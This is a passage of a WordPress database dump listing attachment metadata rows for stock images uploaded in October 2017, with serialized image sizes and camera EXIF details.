:8:\"keywords\";a:0:{}}}'),(492,216,'_wp_attached_file','2017/10/women-teamwork.jpg'),(493,216,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:26:\"2017/10/women-teamwork.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"women-teamwork-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"women-teamwork-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"women-teamwork-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(494,217,'_wp_attached_file','2017/10/wood-materials.jpg'),(495,217,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:26:\"2017/10/wood-materials.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"wood-materials-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"wood-materials-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"wood-materials-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(496,218,'_wp_attached_file','2017/10/wood.jpg'),(497,218,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:16:\"2017/10/wood.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"wood-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"wood-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"wood-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(498,219,'_wp_attached_file','2017/10/wooden-home.jpg'),(499,219,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:23:\"2017/10/wooden-home.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"wooden-home-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"wooden-home-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"wooden-home-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 500D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:3:\"1.3\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(500,220,'_wp_attached_file','2017/10/woodland-road.jpg'),(501,220,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:25:\"2017/10/woodland-road.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"woodland-road-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"woodland-road-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"woodland-road-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(502,221,'_wp_attached_file','2017/10/wool-480550_960_720.jpg'),(503,221,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:652;s:4:\"file\";s:31:\"2017/10/wool-480550_960_720.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"wool-480550_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"wool-480550_960_720-300x204.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"wool-480550_960_720-768x522.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(504,222,'_wp_attached_file','2017/10/Woolworths_Hounslow_-_Closing_Down_Sale_-_Exterior.jpg'),(505,222,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:768;s:4:\"file\";s:62:\"2017/10/Woolworths_Hounslow_-_Closing_Down_Sale_-_Exterior.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:62:\"Woolworths_Hounslow_-_Closing_Down_Sale_-_Exterior-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:62:\"Woolworths_Hounslow_-_Closing_Down_Sale_-_Exterior-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:62:\"Woolworths_Hounslow_-_Closing_Down_Sale_-_Exterior-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:63:\"Woolworths_Hounslow_-_Closing_Down_Sale_-_Exterior-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(506,223,'_wp_attached_file','2017/10/work-at-desk.jpg'),(507,223,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:647;s:4:\"file\";s:24:\"2017/10/work-at-desk.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"work-at-desk-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"work-at-desk-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"work-at-desk-768x518.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:518;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(508,224,'_wp_attached_file','2017/10/work.jpg'),(509,224,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:940;s:6:\"height\";i:720;s:4:\"file\";s:16:\"2017/10/work.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"work-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"work-300x230.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"work-768x588.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 30D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(510,225,'_wp_attached_file','2017/10/working-in-cafe.jpg'),(511,225,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:27:\"2017/10/working-in-cafe.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"working-in-cafe-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"working-in-cafe-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"working-in-cafe-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(512,226,'_wp_attached_file','2017/10/working-on-a-home.jpg'),(513,226,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3000;s:6:\"height\";i:1993;s:4:\"file\";s:29:\"2017/10/working-on-a-home.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"working-on-a-home-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"working-on-a-home-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"working-on-a-home-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"working-on-a-home-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"working-on-a-home-1170x777.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:777;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"10\";s:6:\"credit\";s:11:\"Patsy Lynch\";s:6:\"camera\";s:10:\"NIKON D300\";s:7:\"caption\";s:295:\"Oklahoma City,OK, June 22,2010--A roofer repairs a roof that was damaged by tornadoes that ripped through Oklahoma in early May 2010.  FEMA is working with local, state, private and federal agencies and businesses to help individuals  and business with their recovery.  Photo by Patsy Lynch/FEMA\";s:17:\"created_timestamp\";s:10:\"1277206246\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"65\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:38:\"001062210 Okahoma continues to recover\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:5:{i:0;s:8:\"Oklahoma\";i:1;s:4:\"FEMA\";i:2;s:9:\"tornadoes\";i:3;s:8:\"recovery\";i:4;s:4:\"roof\";}}}'),(514,227,'_wp_attached_file','2017/10/working.jpg'),(515,227,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:5472;s:6:\"height\";i:3648;s:4:\"file\";s:19:\"2017/10/working.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"working-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"working-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"working-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"working-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"working-1170x780.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:780;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:11:\"Eric Bailey\";s:6:\"camera\";s:12:\"Canon EOS 6D\";s:7:\"caption\";s:20:\"Startup Stock Photos\";s:17:\"created_timestamp\";s:10:\"1406802194\";s:9:\"copyright\";s:11:\"Sculpt, LLC\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:20:\"Startup Stock Photos\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:2:{i:0;s:8:\"startups\";i:1;s:16:\"entrepreneurship\";}}}'),(516,228,'_wp_attached_file','2017/10/workmen.jpg'),(517,228,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:19:\"2017/10/workmen.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"workmen-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"workmen-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"workmen-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(518,229,'_wp_attached_file','2017/10/world-clocks.jpg'),(519,229,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:678;s:4:\"file\";s:24:\"2017/10/world-clocks.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"world-clocks-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"world-clocks-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"world-clocks-768x542.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:542;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(520,230,'_wp_attached_file','2017/10/world-connections.jpg'),(521,230,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:29:\"2017/10/world-connections.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"world-connections-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"world-connections-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"world-connections-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:7:\"DMC-GM1\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(522,231,'_wp_attached_file','2017/10/world-in-hands.jpg'),(523,231,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:26:\"2017/10/world-in-hands.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"world-in-hands-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"world-in-hands-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"world-in-hands-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(524,232,'_wp_attached_file','2017/10/worldwide-networking.jpg'),(525,232,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:32:\"2017/10/worldwide-networking.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"worldwide-networking-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"worldwide-networking-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"worldwide-networking-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:7:\"DMC-GM1\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(526,233,'_wp_attached_file','2017/10/worthing-coast.jpg'),(527,233,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:678;s:4:\"file\";s:26:\"2017/10/worthing-coast.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"worthing-coast-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"worthing-coast-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"worthing-coast-768x542.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:542;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"14\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:15:\"Canon EOS 1000D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"44\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(528,234,'_wp_attached_file','2017/10/wrapped-gifts.jpg'),(529,234,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:576;s:4:\"file\";s:25:\"2017/10/wrapped-gifts.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"wrapped-gifts-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"wrapped-gifts-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"wrapped-gifts-768x461.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:461;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(530,235,'_wp_attached_file','2017/10/Wrappz-4-cases-pic.png'),(531,235,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1126;s:6:\"height\";i:293;s:4:\"file\";s:30:\"2017/10/Wrappz-4-cases-pic.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Wrappz-4-cases-pic-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Wrappz-4-cases-pic-300x78.png\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Wrappz-4-cases-pic-768x200.png\";s:5:\"width\";i:768;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Wrappz-4-cases-pic-1024x266.png\";s:5:\"width\";i:1024;s:6:\"height\";i:266;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(532,236,'_wp_attached_file','2017/10/wrappz-coaster.jpg'),(533,236,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:688;s:6:\"height\";i:688;s:4:\"file\";s:26:\"2017/10/wrappz-coaster.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"wrappz-coaster-150x150.j